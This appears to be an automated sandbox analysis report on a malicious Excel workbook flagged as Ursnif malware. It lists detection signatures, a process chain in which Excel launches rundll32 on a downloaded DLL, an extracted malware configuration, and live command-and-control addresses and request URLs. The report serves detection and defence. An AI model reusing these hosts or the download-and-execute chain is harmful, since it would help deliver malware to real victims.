Loading ...

Play interactive tourEdit tour

Analysis Report Attached_File_898318.xlsb

Overview

General Information

Sample Name:Attached_File_898318.xlsb
Analysis ID:350713
MD5:a8532cadcdc6aa2ca92e78352727bd50
SHA1:de9a89b9a1ac2778660695a982b9f34641fd3608
SHA256:8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found API chain indicative of debugger detection
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7052 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4536 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6764 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    Process Memory Space: rundll32.exe PID: 4536JoeSecurity_UrsnifYara detected UrsnifJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7052, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer, ProcessId: 4536

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: rundll32.exe.4536.2.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "300", "system": "7d20f8f4847cb6a63944d316a102ff61", "size": "201282", "crc": "2", "action": "00000000", "id": "2200", "time": "1612925042", "user": "3d11f4f58695dc15e71ab15cd7543d9b", "hash": "0xcf6ed071", "soft": "3"}
      Multi AV Scanner detection for domain / URLShow sources
      Source: api10.laptok.atVirustotal: Detection: 10%Perma Link

      Compliance:

      barindex
      Uses new MSVCR DllsShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00A17DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00A17DD8

      Software Vulnerabilities:

      barindex
      Document exploit detected (creates forbidden files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dllJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\ddg\11.dllJump to behavior
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: 2200[1].dll.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: unknownTCP traffic detected without corresponding DNS query: 139.162.190.91
      Source: global trafficHTTP traffic detected: GET /campo/a/a HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 139.162.190.91Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: urbandancecity.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Feb 2021 17:44:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
      Source: sheet9.binString found in binary or memory: http://139.162.190.91/campo/a/a.D
      Source: 2200[1].dll.0.drString found in binary or memory: http://majorleave.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.office.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.onedrive.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://augloop.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.entity.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cortana.ai/api
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://cr.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://directory.services.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.windows.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://graph.windows.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.local
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://management.azure.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://management.azure.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://messaging.office.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ncus-000.contentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officeapps.live.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://settings.outlook.com
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
